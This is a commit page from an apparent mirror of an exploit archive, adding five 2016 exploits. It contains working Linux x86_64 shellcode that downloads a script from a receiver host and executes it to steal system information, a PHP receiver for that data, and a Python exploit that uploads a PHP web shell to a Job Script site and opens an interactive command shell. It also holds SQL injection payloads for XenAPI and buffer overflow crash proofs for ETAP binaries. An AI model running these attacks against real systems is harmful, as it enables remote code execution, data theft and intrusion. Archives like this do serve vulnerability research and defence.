bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-24

Browse source 
5 new exploits

Operation Technology ETAP 14.1.0 - Local Privilege Escalation
Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities
Linux x86_64 Information Stealer Shellcode
Job Script by Scubez - Remote Code Execution
XenAPI 1.4.1 for XenForo - Multiple SQL Injections
This commit is contained in:
Offensive Security 2016-05-24 05:03:46 +00:00
parent 84d38df739
commit 399580a6c2
6 changed files with 1606 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -36029,3 +36029,8 @@ id,file,description,date,author,platform,type,port
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443

Can't render this file because it is too large.

576
platforms/lin_x86-64/shellcode/39847.c Executable file
View file

@ -0,0 +1,576 @@
/*
# Title : Linux x86_64 information stealer
# Date : 23-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : shifath12@gmail.com
*/
/*
How does this shellcode works
-----------------------------------
1. First it connects to the information reciver
2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
3. duplicating stdout,stderr with socket descriptor
4. then it execute the script using sh
*/
/*
Note: the pri.sh file was in kali linux.the server was Kali linux
client was Ubuntu
it downloads the pri.sh from kali linux
and Executes it on Ubuntu
*/
/*
Requirements of this shellcode
--------------------------------------
1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
2.reciver ip
*/
/*
How to use this shellcode
---------------------------------
1. Upload the pri.sh any site
2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
3. Customize the connect procedure for connect to the reciver where i marked
4. U need to know assembly to completed 1,2 instruction
*/
/*
Reciver
---------
To recive the Information U may Use Netcat
If U want to view the informations on Web browser , I've a php script for U. upload it any site.
<?php
if (!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Couldn't create socket: [$errorcode] $errormsg \n");}
echo "Socket created \n\n";
if ( !socket_bind($sock, "0.0.0.0" , 1532) )
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not bind socket : [$errorcode] $errormsg \n");}
echo "Socket bind OK \n\n";
if (!socket_listen ($sock , 10))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not listen on socket : [$errorcode] $errormsg \n");}
echo "Socket listen OK \n\n\n";
echo "Waiting for incoming connections... \n";
//Accept incoming connection - This is a blocking call
$client = socket_accept($sock);
//display information about the client who is connected
if (socket_getpeername($client , $address , $port))
{
echo "Client $address : $port is now connected to us. \n";
}
//read data from the incoming socket
while(1)
{
$i= socket_recv($client,$buf, 1024000,MSG_WAITALL);
if($i<=0)
die("\nconnection closed by $address");
else
echo $buf."\n\n";
}
?>
if U this script , the reciver ip will be the website ip
BUT I RECOMMEND U TO USE NETCAT
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 6a 06 pushq $0x6
400082: 6a 01 pushq $0x1
400084: 6a 02 pushq $0x2
400086: 5f pop %rdi
400087: 5e pop %rsi
400088: 5a pop %rdx
400089: 6a 29 pushq $0x29
40008b: 58 pop %rax
40008c: 0f 05 syscall
40008e: 48 31 db xor %rbx,%rbx
400091: 48 89 c3 mov %rax,%rbx
400094: 48 31 c0 xor %rax,%rax
400097: 48 31 ff xor %rdi,%rdi
40009a: b0 39 mov $0x39,%al
40009c: 0f 05 syscall
40009e: 4d 31 c9 xor %r9,%r9
4000a1: 4c 39 c8 cmp %r9,%rax
4000a4: 74 18 je 4000be <connect>
4000a6: 6a 3c pushq $0x3c
4000a8: 58 pop %rax
4000a9: 0f 05 syscall
00000000004000ab <retry>:
4000ab: 48 31 f6 xor %rsi,%rsi
4000ae: 48 f7 e6 mul %rsi
4000b1: 56 push %rsi
4000b2: 6a 3c pushq $0x3c
4000b4: 48 89 e7 mov %rsp,%rdi
4000b7: b0 23 mov $0x23,%al
4000b9: 0f 05 syscall
4000bb: eb 01 jmp 4000be <connect>
4000bd: c3 retq
00000000004000be <connect>:
4000be: 6a 10 pushq $0x10
4000c0: 5a pop %rdx
4000c1: 53 push %rbx
4000c2: 5f pop %rdi
4000c3: 48 31 c0 xor %rax,%rax
4000c6: 50 push %rax
4000c7: 50 push %rax
4000c8: 50 push %rax
4000c9: c6 04 24 02 movb $0x2,(%rsp)
4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp)
4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp)
4000db: 81
4000dc: 48 89 e6 mov %rsp,%rsi
4000df: b0 2a mov $0x2a,%al
4000e1: 0f 05 syscall
4000e3: 48 31 ff xor %rdi,%rdi
4000e6: 48 39 f8 cmp %rdi,%rax
4000e9: 7c c0 jl 4000ab <retry>
4000eb: 48 31 c0 xor %rax,%rax
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 ff c6 inc %rsi
4000f4: 48 89 df mov %rbx,%rdi
4000f7: b0 21 mov $0x21,%al
4000f9: 0f 05 syscall
4000fb: 48 31 c0 xor %rax,%rax
4000fe: 48 ff c6 inc %rsi
400101: 48 89 df mov %rbx,%rdi
400104: b0 21 mov $0x21,%al
400106: 0f 05 syscall
400108: 48 31 c0 xor %rax,%rax
40010b: 48 83 c0 39 add $0x39,%rax
40010f: 0f 05 syscall
400111: 48 31 ff xor %rdi,%rdi
400114: 4d 31 e4 xor %r12,%r12
400117: 49 89 c4 mov %rax,%r12
40011a: 48 39 f8 cmp %rdi,%rax
40011d: 74 59 je 400178 <wget>
40011f: 4d 31 d2 xor %r10,%r10
400122: 48 31 d2 xor %rdx,%rdx
400125: 4c 89 d6 mov %r10,%rsi
400128: 4c 89 e7 mov %r12,%rdi
40012b: 48 31 c0 xor %rax,%rax
40012e: b0 3d mov $0x3d,%al
400130: 0f 05 syscall
400132: 48 31 c0 xor %rax,%rax
400135: 48 31 d2 xor %rdx,%rdx
400138: 50 push %rax
400139: 50 push %rax
40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
400148: 68
400149: 48 89 e7 mov %rsp,%rdi
40014c: 50 push %rax
40014d: 50 push %rax
40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp)
400161: 48 89 e6 mov %rsp,%rsi
400164: 52 push %rdx
400165: 56 push %rsi
400166: 57 push %rdi
400167: 48 89 e6 mov %rsp,%rsi
40016a: 48 83 c0 3b add $0x3b,%rax
40016e: 0f 05 syscall
400170: 41 51 push %r9
400172: 5f pop %rdi
400173: 6a 03 pushq $0x3
400175: 58 pop %rax
400176: 0f 05 syscall
0000000000400178 <wget>:
400178: 48 31 c0 xor %rax,%rax
40017b: 50 push %rax
40017c: 50 push %rax
40017d: 50 push %rax
40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp)
400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp)
40018c: 6e
40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp)
400194: 67
400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp)
40019c: 48 89 e7 mov %rsp,%rdi
40019f: 50 push %rax
4001a0: 50 push %rax
4001a1: 50 push %rax
4001a2: 50 push %rax
4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp)
4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp)
4001b1: 31
4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp)
4001b9: 31
4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp)
4001c1: 33
4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp)
4001c9: 32
4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp)
4001d1: 72
4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp)
4001d9: 68
4001da: 48 89 e6 mov %rsp,%rsi
4001dd: 48 31 d2 xor %rdx,%rdx
4001e0: 50 push %rax
4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp)
4001e7: 48 89 e1 mov %rsp,%rcx
4001ea: 50 push %rax
4001eb: 50 push %rax
4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp)
4001ff: 49 89 e7 mov %rsp,%r15
400202: 52 push %rdx
400203: 41 57 push %r15
400205: 51 push %rcx
400206: 56 push %rsi
400207: 57 push %rdi
400208: 48 89 e6 mov %rsp,%rsi
40020b: b0 3b mov $0x3b,%al
40020d: 0f 05 syscall
*/
/*
section .text
global _start
;-----------------
_start:
;socket()
push 6
push 1
push 2
pop rdi
pop rsi
pop rdx
push 41
pop rax
syscall
;------------------
xor rbx,rbx
mov rbx,rax ;socket descriptor
;-------------
xor rax,rax
xor rdi,rdi
mov al,57
syscall
xor r9,r9
cmp rax,r9
jz connect
push byte 60
pop rax
syscall
retry:
xor rsi,rsi
mul rsi
push rsi
push byte 60 ;1 min ( change it if U want )
mov rdi,rsp
mov al,35
syscall
jmp connect
ret
connect:
;connect()
push 16
pop rdx
push rbx
pop rdi
xor rax,rax
push rax
push rax
push rax
mov [rsp],byte 2
;-----------------------------------
;customize these staetments
mov [rsp+2],word 0xfc05 ;port 1532 ( U may change it, As U wish )
mov [rsp+4],dword 0x811ea8c0 ;ip of reciver (must change it)
;--------------------------------------
mov rsi,rsp
mov al,42
syscall
xor rdi,rdi
cmp rax,rdi
jl retry
;------------dup2(sd,1)
xor rax,rax
xor rsi,rsi
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------dup2(sd,2)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;fork()
xor rax,rax
add rax,57
syscall
xor rdi,rdi
xor r12,r12
mov r12,rax ;pid
cmp rax,rdi
jz wget
;---------------
;wait4()
xor r10,r10 ;null
xor rdx,rdx ;null
mov rsi,r10 ;status
mov rdi,r12 ;pid
xor rax,rax
mov al,61
syscall
;;
;-------------------------
;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL);
xor rax,rax
xor rdx,rdx
push rax
push rax
mov [rsp],dword '//bi'
mov [rsp+4],dword 'n/sh'
mov rdi,rsp
push rax
push rax
mov [rsp],dword '.pri'
mov [rsp+4],word '.s'
mov [rsp+6],byte 'h'
mov rsi,rsp
push rdx
push rsi
push rdi
mov rsi,rsp
add rax,59
syscall
;--------
;close(fd)
push r9
pop rdi
push 3
pop rax
syscall
wget:
;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL)
xor rax,rax
push rax
push rax
push rax
mov [rsp],dword '/usr'
mov [rsp+4],dword '/bin'
mov [rsp+8],dword '//wg'
mov [rsp+12],word 'et'
mov rdi,rsp
push rax
push rax
push rax
push rax
;----------------------
;cusmizetd these statements for the link of pri.sh
mov [rsp],dword 'http'
mov [rsp+4],dword '://1'
mov [rsp+8],dword '92.1'
mov [rsp+12],dword '68.3'
mov [rsp+16],dword '0.12'
mov [rsp+20],dword '9/pr'
mov [rsp+24],dword 'i.sh'
;------------------------
mov rsi,rsp
xor rdx,rdx
push rax
mov [rsp],word '-O'
mov rcx,rsp
push rax
push rax
mov [rsp],dword '.pri'
mov [rsp+4],word '.s'
mov [rsp+6],byte 'h'
mov r15,rsp
push rdx
push r15
push rcx
push rsi
push rdi
mov rsi,rsp
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */
int main()
{
printf("shellcode length %ld",( unsigned long ) strlen(shellcode));
( * (int(*)()) shellcode) ();
}

128
platforms/php/webapps/39848.py Executable file
View file

@ -0,0 +1,128 @@
#!C:/Python27/python.exe -u
#
#
# JobScript Remote Code Execution Exploit
#
#
# Vendor: Jobscript
# Product web page: http://www.jobscript.in
# Affected version: Unknown
#
# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL
# database. It's a complete job script for those who wants to start a professional
# job portal website like naukri.com, monster.com, clickjobs.com or any such major
# job portals. Jobscript was designed and developed with the following features like
# control panel for Employer's and also for Job Seeker's, email alerts, job search,
# online resume, payment and membership plans.
#
# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The
# vulnerability is caused due to the improper verification of uploaded files in
# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can
# be exploited to execute arbitrary PHP code by uploading a malicious PHP script
# file with '.php' extension (to bypass the '.htaccess' block rule) that will be
# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory.
#
# Tested on: Apache 2.4.9
# PHP 5.4.26
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5322
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php
#
#
# 31.03.2016
#
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import os, time, re, requests, httplib
from cStringIO import StringIO
from urllib2 import URLError
global file, file1
file = ';nonce'
file1 = '"security"'
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
prelogin = opener2.open('http://'+host+'/jobmonster/member-2/')
output = prelogin.read()
for line in output.splitlines():
if file1 in line:
security = str(line.split("=")[4:])[3:13]
break
print 'Login please.'
username = raw_input('Enter username: ')
password = raw_input('Enter password: ')
login_data = urllib.urlencode({
'action' : 'noo_ajax_login',
'log' : username,
'pwd' : password,
'remember' : 'false',
'security' : security,
'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1'
})
login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data)
auth = login.read()
if re.search(r'false', auth):
print 'Incorrect username or password'
sys.exit()
else:
print 'Authenticated'
response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1')
response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general')
output = response.read()
for line in output.splitlines():
if file in line:
nonce = str(line.split("=")[3:])[28:38]
headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'}
body = """-----------------------------51402178812572
Content-Disposition: form-data; name="name"
RCE.php
-----------------------------51402178812572
Content-Disposition: form-data; name="file"; filename="RCE.php"
Content-Type: application/pdf
<?php
system($_GET['cmd']);
?>
-----------------------------51402178812572--"""
response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj)
raw_input()
while True:
try:
cmd = raw_input('shell@'+host+':~# ')
execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()

85
platforms/php/webapps/39849.txt Executable file
View file

@ -0,0 +1,85 @@
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: XenAPI for XenForo
Vendor URL: github.com/Contex/XenAPI
Type: SQL Injection [CWE-89]
Date found: 2016-05-20
Date published: 2016-05-23
CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
XenAPI for XenForo v1.4.1
older versions may be affected too but were not tested.
4. INTRODUCTION
===============
This Open Source REST API allows usage of several of XenForo's functions,
such as authentication, user information and many other functions!
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The plugin "XenAPI" for XenForo offers a REST Api with different functions
to query and edit information from the XenForo database backend. Amongst
those are "getGroup" and "getUsers", which can be called without
authentication (default) and since the application does not properly
validate and sanitize the "value" parameter, it is possible to inject
arbitrary SQL commands into the XenForo backend database.
The following proof-of-concepts exploit each vulnerable REST action
and extract the hostname of the server:
https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
6. RISK
=======
The vulnerability allows remote attackers to read sensitive information
from the XenForo database like usernames and passwords. Since the affected
REST actions do not require an authentication hash, these vulnerabilities
can be exploited by an unauthenticated attacker.
7. SOLUTION
===========
Update to the latest version v1.4.2
8. REPORT TIMELINE
==================
2016-05-20: Discovery of the vulnerability
2016-05-20: Notified vendor via contact address
2016-05-20: Vendor provides update for both issues
2016-05-21: Provided update fixes the reported issues
2016-05-21: Vendor publishes update
2016-05-23: Advisory released
9. REFERENCES
=============
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336

331
platforms/windows/dos/39846.txt Executable file
View file

@ -0,0 +1,331 @@

Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities
Vendor: Operation Technology, Inc.
Product web page: http://www.etap.com
Affected version: 14.1.0.0
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
is the most comprehensive electrical engineering software platform for the
design, simulation, operation, and automation of generation, transmission,
distribution, and industrial systems. As a fully integrated model-driven
enterprise solution, ETAP extends from modeling to operation to offer a
Real-Time Power Management System.
Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow
vulnerability because the application fails to handle malformed arguments.
An attacker can exploit these issues to execute arbitrary code within the
context of the application or to trigger a denial-of-service conditions.
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5324
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php
07.04.2016
--
Confirmed vulnerable binaries:
------------------------------
acsdvd.exe
ca.exe
csdvd.exe
DBExtractConsoleApp.exe
dccalc.exe
etarcgis.exe
etarcgis92.exe
etarcgis93.exe
ETArcGIS_TD.exe
ETArcGIS_TD10.exe
etcabp.exe
etcp.exe
etgrd.exe
ETPanelRep.exe
ET_CATIA.exe
et_ieee.exe
harmonic.exe
LA3PH.exe
LF3PH.exe
lffd.exe
lfgs.exe
lfle.exe
lfnr.exe
ms.exe
OCP.exe
opf.exe
OtiMongoConvert.exe
PlotCompare64.exe
ra.exe
SC3Ph.exe
scansi1p.exe
scansi3p.exe
SCGost1p.exe
sciec1p.exe
sciec3p.exe
sciectr.exe
scsource.exe
SFA.exe
so3ph.exe
stlf.exe
svc.exe
TDULF.exe
ts.exe
uc.exe
PoCs:
-----
[vuln binary] [>256 bytes as arg]
===================================
C:\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(281c.202c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe
eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb
eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
etcp+0x7f38:
00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341
0:000> !exchain
0018ff3c: etcp+10041 (00410041)
Invalid exception stack at 00410041
===================================
C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.String.wcslen(Char* ptr)
at System.String.CtorCharPtr(Char* ptr)
at wmain(Int32 argc, Char** argv, Char** envp)
at wmainCRTStartup()
(3a98.1e20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
mscorlib_ni+0x48f380:
000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????
0:000> d rdi
00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.
00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
C:\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe -
eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000
eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc
